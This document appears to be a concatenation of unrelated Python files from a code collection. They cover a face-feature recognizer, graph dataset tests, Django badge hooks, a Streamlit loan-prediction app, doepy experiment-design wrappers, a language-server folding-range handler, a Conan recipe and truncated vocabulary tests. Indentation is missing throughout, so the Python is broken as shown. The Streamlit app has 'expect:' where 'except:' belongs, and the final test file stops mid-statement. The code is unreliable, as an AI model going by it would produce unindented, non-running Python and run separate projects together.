resized =skimage.transform.resize(img,(self.image_dims[0], self.image_dims[1]))*255
X=np.empty((1,3,self.image_dims[0],self.image_dims[1]))
X[0,0,:,:]=resized[:,:,2]
X[0,1,:,:]=resized[:,:,0]
X[0,2,:,:]=resized[:,:,1]
test_num=np.shape(X)[0]
out = self.forward_all(data=X)
#extract feature
feature = np.float64(out['deepid'])
feature=np.reshape(feature,(test_num,feature_size))
return feature
def compare_pic(self,feature1,feature2):
predicts=pw.pairwise_distances(feature2, feature1,'cosine')
#predicts=pw.cosine_similarity(feature1, feature2)
return predicts
def compare_pic2(self,path1,path2):
feature1 = self.getFeature2(path1)
feature2 = self.getFeature2(path2)
predicts = self.compare_pic(feature1,feature2)
return predicts
def classify(self,path):
feature1 = self.getFeature2(path)
fid=open('./filelist/sample.txt')
lines=fid.readlines()
test_num=len(lines)
fid.close()
i =0
msg='out:'
for line in lines:
word=line.split('\n')
filename=word[0]
feature2 = self.getFeature2(filename)
predicts = self.compare_pic(feature1,feature2)
tmp='(%d,%f)'%(i,predicts)
msg=msg+tmp
i=i+1
print msg
if __name__ == '__main__':
step = 2
top1_accuracy = []
top5_accuracy = []
for i in range(30,30 + 1):
iteration = str(i * step)
tripletnet= Recognizer('./models/deploy.prototxt',
'./data/models/triplet/alexnet_triplet_iter_' + iteration + '.caffemodel',
'./data/models/softmax/mean.binaryproto')
#alexnet= Recognizer('/home/frank/triplet-master/data/models/softmax/deploy.prototxt',
# '/home/frank/digits/digits/jobs/20170429-175608-c101/snapshot_iter_' + iteration + '.caffemodel',
# '/home/frank/triplet-master/data/models/softmax/mean.binaryproto')
##ALEXNET TEST
#start = time.time()
#model_accuracy = alexnet.test_alex()
##TRIPLET TEST
#tripletnet.saveFeature()
model_accuracy = tripletnet.evaluate3()
top1_accuracy.append(model_accuracy[0])
top5_accuracy.append(model_accuracy[1])
#with open(accuracy_path + model_name + '-top1-' +iteration + '.txt', 'w') as file:
# file.write(str(model_accuracy[0]))
#with open(accuracy_path + model_name + '-top5-' +iteration + '.txt', 'w') as file:
# file.write(str(model_accuracy[1]))
top1_accuracy = np.array(top1_accuracy)
#top1_accuracy.tofile(accuracy_path + model_name + '-top1.dat')
#np.savetxt(accuracy_path + model_name + '-top1.out',top1_accuracy,delimiter=',')
top5_accuracy = np.array(top5_accuracy)
#top5_accuracy.tofile(top5_accuracy + model_name + '-top5.dat')
#np.savetxt(accuracy_path + model_name + '-top5.out',top5_accuracy,delimiter=',')
#print(accuracy)
|
11521253
|
import unittest
import warnings
import torch
from tqdm import tqdm
from data.utils import get_db_container, get_db_info
from utils import get_dataloader, get_train_val_test_datasets
dataset_names = ('acquirevaluedshopperschallenge',
'homecreditdefaultrisk',
'kddcup2014')
class TestDatabaseDataset(unittest.TestCase):
def test_datapoints_for_no_self_loops_and_nonnegative_edge_types(self):
for db_name in dataset_names:
for dataset in get_train_val_test_datasets(dataset_name=db_name,
train_test_split='use_full_train',
encoders=dict(
CATEGORICAL='CategoricalOrdinalEnc',
SCALAR='ScalarRobustScalerEnc',
DATETIME='DatetimeScalarEnc',
LATLONG='LatLongScalarEnc',
TEXT='TextSummaryScalarEnc'), ):
for dp_id, (edge_list, node_types, edge_types, features, label) in tqdm(dataset):
# Nodes don't have any self loops in the raw data
for edge in edge_list:
self.assertNotEqual(edge[0], edge[1])
# All edge types are nonnegative in the raw data
self.assertTrue(all(et >= 0 for et in edge_types))
def test_train_val_and_test_splits_contain_different_datapoints(self):
for train_test_split in ['use_full_train', 'xval0', 'xval1', 'xval2', 'xval3', 'xval4']:
for db_name in dataset_names:
train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=db_name,
train_test_split=train_test_split,
encoders=dict(
CATEGORICAL='CategoricalOrdinalEnc',
SCALAR='ScalarRobustScalerEnc',
DATETIME='DatetimeScalarEnc',
LATLONG='LatLongScalarEnc',
TEXT='TextSummaryScalarEnc'), )
self.assertEqual(0, len(
set(train_data.datapoint_ids).intersection(val_data.datapoint_ids).intersection(
test_data.datapoint_ids)))
class TestDataBaseClass:
class TestData(unittest.TestCase):
db_name = None
def setUp(self):
self.db_info = get_db_info(self.db_name)
batch_size = 1
num_workers = 0
max_nodes_per_graph = 100000
_ = get_db_container(self.db_name)
train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=self.db_name,
train_test_split='use_full_train',
encoders=dict(
CATEGORICAL='CategoricalOrdinalEnc',
SCALAR='ScalarRobustScalerEnc',
DATETIME='DatetimeScalarEnc',
LATLONG='LatLongScalarEnc',
TEXT='TextSummaryScalarEnc'), )
train_loader = get_dataloader(dataset=train_data,
batch_size=batch_size,
sampler_class_name='SequentialSampler',
num_workers=num_workers,
max_nodes_per_graph=max_nodes_per_graph)
val_loader = get_dataloader(dataset=val_data,
batch_size=batch_size,
sampler_class_name='SequentialSampler',
num_workers=num_workers,
max_nodes_per_graph=max_nodes_per_graph)
test_loader = get_dataloader(dataset=test_data,
batch_size=batch_size,
sampler_class_name='SequentialSampler',
num_workers=num_workers,
max_nodes_per_graph=max_nodes_per_graph)
self.loaders = {'train': train_loader,
'val': val_loader,
'test': test_loader}
def test_loaded_datapoints(self):
label_node_type, label_feature_name = self.db_info['label_feature'].split('.')
for split, loader in self.loaders.items():
with warnings.catch_warnings():
warnings.simplefilter('ignore')
for bdgl, features, label in tqdm(loader):
# No empty graphs
self.assertGreater(bdgl.number_of_nodes(), 0)
# Every edge has an equal and opposite edge with negative edge type
uvt = torch.stack((*bdgl.all_edges('uv', 'eid'), bdgl.edata['edge_types'])).t()
u_v_type = []
v_u_negtype = []
for u, v, type in uvt.tolist():
u_v_type.append((u, v, type))
v_u_negtype.append((v, u, -type))
u_v_type_set = set(u_v_type)
v_u_negtype_set = set(v_u_negtype)
self.assertEqual(uvt.shape[0], len(u_v_type_set)) # Make sure no redundant edges
self.assertEqual(u_v_type_set, v_u_negtype_set)
# Every node gets a self loop after collation
for i in range(bdgl.number_of_nodes()):
self.assertIn((i, i, 0), u_v_type_set)
# Self loops have type 0
for u, v, type in u_v_type:
if u == v:
self.assertEqual(0, type)
# Features have all the right keys and numbers of values
self.assertGreater(len(features.keys()), 0)
for node_type, feats in features.items():
feat_keys = set(feats.keys())
# Ignore the label feature
if node_type == label_node_type:
feat_keys = feat_keys.union([label_feature_name])
self.assertEqual(feat_keys, self.db_info['node_types_and_features'][node_type].keys())
node_type_int = self.db_info['node_type_to_int'][node_type]
n_nodes_this_type = (bdgl.ndata['node_types'] == node_type_int).sum().item()
for feat_vals in feats.values():
self.assertEqual(n_nodes_this_type, feat_vals.shape[0])
# Only test points have labels
if split == 'test':
self.assertIsNone(label)
else:
self.assertIsNotNone(label)
# Label isn't present in features
self.assertNotIn(label_feature_name, features[label_node_type].keys())
def test_null_counts_in_database_are_reasonable_and_match_preprocessed_datapoints(self):
# Count up nulls in preprocessed datapoints
n_null_counts = {}
for split, loader in self.loaders.items():
for _, (_, _, _, features, _) in tqdm(loader.dataset):
for node_type, f in features.items():
n_null_counts.setdefault(node_type, {})
for feature_name, values in f.items():
n_null_counts[node_type].setdefault(feature_name, 0)
n_null_counts[node_type][feature_name] += values.count(None)
# Make sure nulls in preprocessed datapoints match those in db_info
for node_type, features in self.db_info['node_types_and_features'].items():
for feature_name, feature_info in features.items():
# Skip target feature, because it's not in the node features
if self.db_info['label_feature'] == '{}.{}'.format(node_type, feature_name):
continue
self.assertEqual(n_null_counts[node_type][feature_name], feature_info['n_null_values'],
f'node_type: {node_type}, feature_name: {feature_name}')
|
11521269
|
from os.path import dirname, basename
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from django.db.models import get_apps, get_models, signals
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
import badger
import badger.utils
if "notification" in settings.INSTALLED_APPS:
from notification import models as notification
from django.utils.translation import ugettext_noop as _
def create_notice_types(app, created_models, verbosity, **kwargs):
notices = (
("badge_edited", _(u"Badge edited"),
_(u"one of your badges has been edited")),
("badge_awarded", _(u"Badge awarded"),
_(u"one of your badges has been awarded to someone")),
("award_received", _(u"Award received"),
_(u"you have been awarded a badge")),
#("award_accepted", _(u"Badge award accepted"),
# _(u"someone has accepted an award for one of your badges")),
#("award_declined", _(u"Badge award declined"),
# _(u"someone has declined an award for one of your badges")),
# TODO: Notification on progress?
("nomination_submitted", _(u"Nomination submitted"),
_(u"someone has submitted a nomination for one of your badges")),
("nomination_approved", _(u"Nomination approved"),
_(u"a nomination you submitted for an award has been approved")),
("nomination_rejected", _(u"Nomination rejected"),
_(u"a nomination you submitted for an award has been rejected")),
("nomination_received", _(u"Nomination received"),
_(u"a nomination to award you a badge was approved")),
("nomination_accepted", _(u"Nomination accepted"),
_(u"a nomination you submitted for an award has been accepted")),
)
for notice in notices:
notification.create_notice_type(*notice)
signals.post_syncdb.connect(create_notice_types, sender=notification)
def update_badges(overwrite=False):
from django.utils.importlib import import_module
for app in settings.INSTALLED_APPS:
mod = import_module(app)
try:
badges_mod = import_module('%s.badges' % app)
fixture_label = '%s_badges' % app.replace('.','_')
call_command('loaddata', fixture_label, verbosity=1)
if hasattr(badges_mod, 'badges'):
badger.utils.update_badges(badges_mod.badges, overwrite)
if hasattr(badges_mod, 'update_badges'):
badges_mod.update_badges(overwrite)
except ImportError:
if module_has_submodule(mod, 'badges'):
raise
signals.post_syncdb.connect(lambda *args, **kwargs: update_badges(),
sender=badger.models)
|
11521293
|
import pandas as pd
import numpy as np
from sklearn import metrics
import streamlit as st
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
df=pd.read_csv("data.csv")
df = df.drop(['ID','Experience'], axis = 1)
X=df[['Age','Income','CCAvg','Education','Mortgage','Securities Account','Online',"CreditCard"]].values
y=df['Personal Loan'].values
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X = sc.fit_transform(X)
from sklearn import preprocessing
X = preprocessing.normalize(X)
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)
def results(model):
res = model.predict([ipt])
if res == 1:
st.success("The Customer will avail the loan")
else:
st.success("The Customer will not avail the loan")
html_temp = '''
<div style = "background-color: rgba(25,25,112,0.06); padding-bottom: 20px; padding-top: 20px; padding-left: 5px; padding-right: 5px">
<center><h1>Bank Loan Modelling</h1></center>
</div>
'''
st.markdown(html_temp, unsafe_allow_html=True)
st.sidebar.subheader("Input Features")
st.sidebar.text("Specify your inputs here")
ipt = []
ipt.append(st.sidebar.slider('Age',1,100,20))
ipt.append(st.sidebar.number_input('Income'))
ipt.append(st.sidebar.number_input('CCAvg'))
ipt.append(st.sidebar.radio('Education',[1,2,3]))
ipt.append(st.sidebar.number_input('Mortgage'))
ipt.append(st.sidebar.radio('Securities Account',[0,1]))
ipt.append(st.sidebar.radio('Online',[0,1]))
ipt.append(st.sidebar.radio('CreditCard',[0,1]))
html_temp_2 = '''
<div style = "padding-bottom: 20px; padding-top: 20px; padding-left: 20px; padding-right: 20px">
<center><h2>Model Selection</h2></center>
</div>
'''
st.markdown(html_temp_2, unsafe_allow_html=True)
select = st.selectbox("Please Select your model from the following options",("Please Select","Logistic Regression","Support Vector Machine","KNeighbours Classifier","Naive-Bayes Classifier"))
try:
if select == "Logistic Regression":
model = LogisticRegression()
model.fit(X_train,y_train)
if select == "Support Vector Machine":
model = SVC(kernel = 'linear')
model.fit(X_train,y_train)
if select == "KNeighbours Classifier":
model = KNeighborsClassifier(n_neighbors = 7)
model.fit(X_train,y_train)
if select == "Naive-Bayes Classifier":
model = GaussianNB()
model.fit(X_train,y_train)
if st.button("Predict"):
results(model)
expect:
pass
|
11521303
|
import os
import pytest
from statuscheck.services import SERVICES
from statuscheck.utils import get_available_services, get_statuscheck_api
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def test_get_available_services():
services = get_available_services()
assert services
services_dir = os.path.join(BASE_DIR, "statuscheck", "services")
service_files = os.listdir(services_dir)
excluded_files = (
"__pycache__",
"__init__.py",
)
service_files = [
f[:-3]
for f in service_files
if f not in excluded_files and os.path.isfile(os.path.join(services_dir, f))
]
assert set(services) == set(service_files)
@pytest.mark.parametrize("service", SERVICES)
def test_get_statuscheck_api(service):
api = get_statuscheck_api(service)
summary = api.get_summary()
assert api._module_name == service
assert api.status_url
assert api.service_url
assert api.summary
assert api.summary == summary
assert api.summary.as_dict()
|
11521304
|
from doepy.doe_functions import (
build_full_fact,
build_frac_fact_res,
build_plackett_burman,
build_sukharev,
build_box_behnken,
build_central_composite,
build_lhs,
build_space_filling_lhs,
build_random_k_means,
build_maximin,
build_halton,
build_uniform_random,
)
def full_fact(d):
"""
Builds a full factorial design dataframe from a dictionary of factor/level ranges
Example of the dictionary which is needed as the input:
{'Pressure':[50,60,70],'Temperature':[290, 320, 350],'Flow rate':[0.9,1.0]}
"""
return build_full_fact(d)
def frac_fact_res(d, res=None):
"""
Builds a 2-level fractional factorial design dataframe from a dictionary of factor/level ranges and given resolution.
Parameters
----------
factor_level_ranges : Dictionary of factors and ranges
Only min and max values of the range are required.
If more than two levels are given, the extreme values will be set to the low/high levels.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
res : int
Desired design resolution.
Default: Set to half of the total factor count.
Notes
-----
The resolution of a design is defined as the length of the shortest
word in the defining relation. The resolution describes the level of
confounding between factors and interaction effects, where higher
resolution indicates lower degree of confounding.
For example, consider the 2^4-1-design defined by
gen = "a b c ab"
The factor "d" is defined by "ab" with defining relation I="abd", where
I is the unit vector. In this simple example the shortest word is "abd"
meaning that this is a resolution III-design.
In practice resolution III-, IV- and V-designs are most commonly applied.
* III: Main effects may be confounded with two-factor interactions.
* IV: Main effects are unconfounded by two-factor interactions, but
two-factor interactions may be confounded with each other.
* V: Main effects unconfounded with up to four-factor interactions,
two-factor interactions unconfounded with up to three-factor
interactions. Three-factor interactions may be confounded with
each other.
Examples
--------
::
>>> d1 = {'A':[1,5],'B':[0.3,0.7],'C':[10,15],'D':[3,7],'E':[-2,-1]}
>>> build_frac_fact_res(d1,3)
A B C D E
0 1.0 0.3 10.0 7.0 -1.0
1 5.0 0.3 10.0 3.0 -2.0
2 1.0 0.7 10.0 3.0 -1.0
3 5.0 0.7 10.0 7.0 -2.0
4 1.0 0.3 15.0 7.0 -2.0
5 5.0 0.3 15.0 3.0 -1.0
6 1.0 0.7 15.0 3.0 -2.0
7 5.0 0.7 15.0 7.0 -1.0
It builds a dataframe with only 8 rows (designs) from a dictionary with 6 factors.
A full factorial design would have required 2^6 = 64 designs.
>>> build_frac_fact_res(d1,5)
Traceback (most recent call last):
...
ValueError: design not possible
"""
return build_frac_fact_res(d, res=res)
def plackett_burman(d):
"""
Builds a Plackett-Burman dataframe from a dictionary of factor/level ranges.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
Plackett–Burman designs are experimental designs presented in 1946 by <NAME> and <NAME> while working in the British Ministry of Supply.(Their goal was to find experimental designs for investigating the dependence of some measured quantity on a number of independent variables (factors), each taking L levels, in such a way as to minimize the variance of the estimates of these dependencies using a limited number of experiments.
Interactions between the factors were considered negligible. The solution to this problem is to find an experimental design where each combination of levels for any pair of factors appears the same number of times, throughout all the experimental runs (refer to table).
A complete factorial design would satisfy this criterion, but the idea was to find smaller designs.
These designs are unique in that the number of trial conditions (rows) expands by multiples of four (e.g. 4, 8, 12, etc.).
The max number of columns allowed before a design increases the number of rows is always one less than the next higher multiple of four.
"""
return build_plackett_burman(d)
def sukharev(d, num_samples=None):
"""
Builds a Sukharev-grid hypercube design dataframe from a dictionary of factor/level ranges.
Number of samples raised to the power of (1/dimension), where dimension is the number of variables, must be an integer.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
Special property of this grid is that points are not placed on the boundaries of the hypercube, but at centroids of the subcells constituted by individual samples.
This design offers optimal results for the covering radius regarding distances based on the max-norm.
"""
return build_sukharev(d, num_samples=num_samples)
def box_behnken(d, center=1):
"""
Builds a Box-Behnken design dataframe from a dictionary of factor/level ranges.
Note 3 levels of factors are necessary. If not given, the function will automatically create 3 levels by linear mid-section method.
Example of the dictionary which is needed as the input:
{'Pressure':[50,60,70],'Temperature':[290, 320, 350],'Flow rate':[0.9,1.0,1.1]}
In statistics, Box–Behnken designs are experimental designs for response surface methodology, devised by <NAME> and <NAME> in 1960, to achieve the following goals:
* Each factor, or independent variable, is placed at one of three equally spaced values, usually coded as −1, 0, +1. (At least three levels are needed for the following goal.)
* The design should be sufficient to fit a quadratic model, that is, one containing squared terms, products of two factors, linear terms and an intercept.
* The ratio of the number of experimental points to the number of coefficients in the quadratic model should be reasonable (in fact, their designs kept it in the range of 1.5 to 2.6).*estimation variance should more or less depend only on the distance from the centre (this is achieved exactly for the designs with 4 and 7 factors), and should not vary too much inside the smallest (hyper)cube containing the experimental points.
"""
return build_box_behnken(d, center=center)
def central_composite(d, center=(2, 2), alpha="o", face="ccc"):
"""
Builds a central-composite design dataframe from a dictionary of factor/level ranges.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
In statistics, a central composite design is an experimental design, useful in response surface methodology, for building a second order (quadratic) model for the response variable without needing to use a complete three-level factorial experiment.
The design consists of three distinct sets of experimental runs:
* A factorial (perhaps fractional) design in the factors studied, each having two levels;
* A set of center points, experimental runs whose values of each factor are the medians of the values used in the factorial portion. This point is often replicated in order to improve the precision of the experiment;
* A set of axial points, experimental runs identical to the centre points except for one factor, which will take on values both below and above the median of the two factorial levels, and typically both outside their range. All factors are varied in this way.
"""
return build_central_composite(d, center=center, alpha=alpha, face=face)
def lhs(d, num_samples=None, prob_distribution=None):
"""
Builds a Latin Hypercube design dataframe from a dictionary of factor/level ranges.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
prob_distribution: Analytical probability distribution to be applied over the randomized sampling.
Accepts one of the following strings:
'Normal', 'Poisson', 'Exponential', 'Beta', 'Gamma'
Latin hypercube sampling (LHS) is a form of stratified sampling that can be applied to multiple variables. The method commonly used to reduce the number or runs necessary for a Monte Carlo simulation to achieve a reasonably accurate random distribution. LHS can be incorporated into an existing Monte Carlo model fairly easily, and work with variables following any analytical probability distribution.
"""
return build_lhs(d, num_samples=num_samples, prob_distribution=prob_distribution)
def space_filling_lhs(d, num_samples=None):
"""
Builds a space-filling Latin Hypercube design dataframe from a dictionary of factor/level ranges.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
"""
return build_space_filling_lhs(d, num_samples=num_samples)
def random_k_means(d, num_samples=None):
"""
This function aims to produce a centroidal Voronoi tesselation of the unit random hypercube and generate k-means clusters.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
"""
return build_random_k_means(d, num_samples=num_samples)
def maximin(d, num_samples=None):
"""
Builds a maximin reconstructed design dataframe from a dictionary of factor/level ranges.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
This algorithm carries out a user-specified number of iterations to maximize the minimal distance of a point in the set to
* other points in the set,
* existing (fixed) points,
* the boundary of the hypercube.
"""
return build_maximin(d, num_samples=num_samples)
def halton(d, num_samples=None):
"""
Builds a quasirandom dataframe from a dictionary of factor/level ranges using prime numbers as seed.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
Quasirandom sequence using the default initialization with first n prime numbers equal to the number of factors/variables.
"""
return build_halton(d, num_samples=num_samples)
def uniform_random(d, num_samples=None):
"""
Builds a design dataframe with samples drawn from uniform random distribution based on a dictionary of factor/level ranges.
Only min and max values of the range are required.
Example of the dictionary which is needed as the input:
{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}
num_samples: Number of samples to be generated
"""
return build_uniform_random(d, num_samples=num_samples)
|
11521356
|
from __future__ import annotations
from asyncio import CancelledError
from typing import TYPE_CHECKING, Any, List, Optional
from ....jsonrpc2.protocol import rpc_method
from ....utils.async_event import async_tasking_event
from ....utils.logging import LoggingDescriptor
from ..has_extend_capabilities import HasExtendCapabilities
from ..language import HasLanguageId
from ..text_document import TextDocument
from ..types import (
FoldingRange,
FoldingRangeParams,
ServerCapabilities,
TextDocumentIdentifier,
)
if TYPE_CHECKING:
from ..protocol import LanguageServerProtocol
from .protocol_part import LanguageServerProtocolPart
class FoldingRangeProtocolPart(LanguageServerProtocolPart, HasExtendCapabilities):
_logger = LoggingDescriptor()
def __init__(self, parent: LanguageServerProtocol) -> None:
super().__init__(parent)
@async_tasking_event
async def collect(sender, document: TextDocument) -> Optional[List[FoldingRange]]:
...
def extend_capabilities(self, capabilities: ServerCapabilities) -> None:
if len(self.collect):
capabilities.folding_range_provider = True
@rpc_method(name="textDocument/foldingRange", param_type=FoldingRangeParams)
async def _text_document_folding_range(
self, text_document: TextDocumentIdentifier, *args: Any, **kwargs: Any
) -> Optional[List[FoldingRange]]:
results: List[FoldingRange] = []
document = self.parent.documents[text_document.uri]
for result in await self.collect(
self,
document,
callback_filter=lambda c: not isinstance(c, HasLanguageId) or c.__language_id__ == document.language_id,
):
if isinstance(result, BaseException):
if not isinstance(result, CancelledError):
self._logger.exception(result, exc_info=result)
else:
if result is not None:
results += result
if len(results) == 0:
return None
return results
|
11521361
|
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
class GladConan(ConanFile):
name = "glad"
description = "Multi-Language GL/GLES/EGL/GLX/WGL Loader-Generator based on the official specs."
topics = ("conan", "glad", "opengl")
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/Dav1dde/glad"
license = "MIT"
exports_sources = ["CMakeLists.txt", "patches/*.patch"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
"no_loader": [True, False],
"spec": ["gl", "egl", "glx", "wgl"], # Name of the spec
"extensions": "ANY", # Path to extensions file or comma separated list of extensions, if missing all extensions are included
# if specification is gl
"gl_profile": ["compatibility", "core"],
"gl_version": ["None", "1.0", "1.1", "1.2", "1.3", "1.4", "1.5", "2.0",
"2.1", "3.0", "3.1", "3.2", "3.3", "4.0", "4.1", "4.2",
"4.3", "4.4", "4.5", "4.6"],
"gles1_version": ["None", "1.0"],
"gles2_version": ["None", "2.0", "3.0", "3.1", "3.2"],
"glsc2_version": ["None", "2.0"],
# if specification is egl
"egl_version": ["None", "1.0", "1.1", "1.2", "1.3", "1.4", "1.5"],
# if specification is glx
"glx_version": ["None", "1.0", "1.1", "1.2", "1.3", "1.4"],
# if specification is wgl
"wgl_version": ["None", "1.0"]
}
default_options = {
"shared": False,
"fPIC": True,
"no_loader": False,
"spec": "gl",
"extensions": "''",
"gl_profile": "compatibility",
"gl_version": "3.3",
"gles1_version": "None",
"gles2_version": "None",
"glsc2_version": "None",
"egl_version": "None",
"glx_version": "None",
"wgl_version": "None"
}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
if self.options.spec != "gl":
del self.options.gl_profile
del self.options.gl_version
del self.options.gles1_version
del self.options.gles2_version
del self.options.glsc2_version
if self.options.spec != "egl":
del self.options.egl_version
if self.options.spec != "glx":
del self.options.glx_version
if self.options.spec != "wgl":
del self.options.wgl_version
if self.options.spec == "wgl" and self.settings.os != "Windows":
raise ConanInvalidConfiguration("{0} specification is not compatible with {1}".format(self.options.spec,
self.settings.os))
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
if "gl_profile" in self.options:
self._cmake.definitions["GLAD_PROFILE"] = self.options.gl_profile
self._cmake.definitions["GLAD_API"] = self._get_api()
self._cmake.definitions["GLAD_EXTENSIONS"] = self.options.extensions
self._cmake.definitions["GLAD_SPEC"] = self.options.spec
self._cmake.definitions["GLAD_NO_LOADER"] = self.options.no_loader
self._cmake.definitions["GLAD_GENERATOR"] = "c" if self.settings.build_type == "Release" else "c-debug"
self._cmake.definitions["GLAD_EXPORT"] = True
self._cmake.definitions["GLAD_INSTALL"] = True
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def _get_api(self):
if self.options.spec == "gl":
spec_api = {
"gl": self.options.gl_version,
"gles1": self.options.gles1_version,
"gles2": self.options.gles2_version,
"glsc2": self.options.glsc2_version
}
elif self.options.spec == "egl":
spec_api = {"egl": self.options.egl_version}
elif self.options.spec == "glx":
spec_api = {"glx": self.options.glx_version}
elif self.options.spec == "wgl":
spec_api = {"wgl": self.options.wgl_version}
api_concat = ",".join("{0}={1}".format(api_name, api_version)
for api_name, api_version in spec_api.items() if api_version != "None")
return api_concat
def package(self):
cmake = self._configure_cmake()
cmake.install()
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
if self.options.shared:
self.cpp_info.defines = ["GLAD_GLAPI_EXPORT"]
if self.settings.os == "Linux":
self.cpp_info.system_libs.append("dl")
|
11521440
|
import pytest
from antu.io import Vocabulary
from collections import Counter
class TestVocabulary:
def test_extend_from_pretrained_vocab(self):
vocab = Vocabulary()
# Test extend a vocabulary from a simple pretained vocab
pretrained_vocabs = {'glove': ['a', 'b', 'c']}
vocab.extend_from_pretrained_vocab(pretrained_vocabs)
assert vocab.get_token_index('a', 'glove') == 2
assert vocab.get_token_index('c', 'glove') == 4
assert vocab.get_token_index('d', 'glove') == 0
# Test extend a vocabulary from a pretained vocabulary,
# and intersect with another vocabulary.
pretrained_vocabs = {'w2v': ['b', 'c', 'd']}
vocab.extend_from_pretrained_vocab(pretrained_vocabs, {'w2v': 'glove'})
assert vocab.get_token_index('b', 'w2v') == 2
assert vocab.get_token_index('d', 'w2v') == 0
assert vocab.get_token_from_index(2, 'w2v') == 'b'
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_from_index(4, 'w2v')
assert excinfo.type == RuntimeError
# Test extend a vocabulary from a no oov pretained vocabulary
pretrained_vocabs = {'glove_nounk': ['a', 'b', 'c']}
vocab.extend_from_pretrained_vocab(
pretrained_vocabs, no_unk_namespace={'glove_nounk', })
assert vocab.get_token_index('a', 'glove_nounk') == 1
assert vocab.get_token_index('c', 'glove_nounk') == 3
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('d', 'glove_nounk')
assert excinfo.type == RuntimeError
# Test extend a vocabulary from a no oov and pad pretained vocabulary
pretrained_vocabs = {'glove_nounk_nopad': ['a', 'b', 'c']}
vocab.extend_from_pretrained_vocab(
pretrained_vocabs,
no_unk_namespace={'glove_nounk_nopad', },
no_pad_namespace={"glove_nounk_nopad"})
assert vocab.get_token_index('a', 'glove_nounk_nopad') == 0
assert vocab.get_token_index('c', 'glove_nounk_nopad') == 2
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('d', 'glove_nounk_nopad')
assert excinfo.type == RuntimeError
def test_extend_from_counter(self):
vocab = Vocabulary()
# Test extend a vocabulary from a simple counter
counter = {'w': Counter(["This", "is", "a", "test", "sentence", '.'])}
vocab.extend_from_counter(counter)
assert vocab.get_token_index('a', 'w') == 4
assert vocab.get_token_index('.', 'w') == 7
assert vocab.get_token_index('That', 'w') == 0
# Test extend a vocabulary from a counter with min_count
counter = {'w_m': Counter(['This', 'is', 'is'])}
min_count = {'w_m': 2}
vocab.extend_from_counter(counter, min_count)
assert vocab.get_token_index('is', 'w_m') == 2
assert vocab.get_token_index('This', 'w_m') == 0
assert vocab.get_token_index('That', 'w_m') == 0
# Test extend a vocabulary from a counter without oov token
counter = {'w_nounk': Counter(['This', 'is'])}
vocab.extend_from_counter(counter, no_unk_namespace={'w_nounk', })
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('That', 'w_nounk')
assert excinfo.type == RuntimeError
assert vocab.get_token_index('This', 'w_nounk') == 1
# Test extend a vocabulary from a counter without pad & unk token
counter = {'w_nounk_nopad': Counter(['This', 'is', 'a'])}
vocab.extend_from_counter(
counter,
no_unk_namespace={'w_nounk_nopad'},
no_pad_namespace={'w_nounk_nopad'})
with pytest.raises(RuntimeError) as excinfo:
vocab.get_token_index('That', 'w_nounk_nopad')
assert excinfo.type == RuntimeError
assert vocab.get_token_index('This', 'w_nounk_nopad') == 0
def test_vocabulary(self):
pretrained_vocabs = {
'glove': ['a', 'b', 'c'],
'w2v': ['b', 'c', 'd'],
'glove_nounk': ['a', 'b', 'c'],
'glove_nounk_nopad': ['a', 'b', 'c']}
counters = {
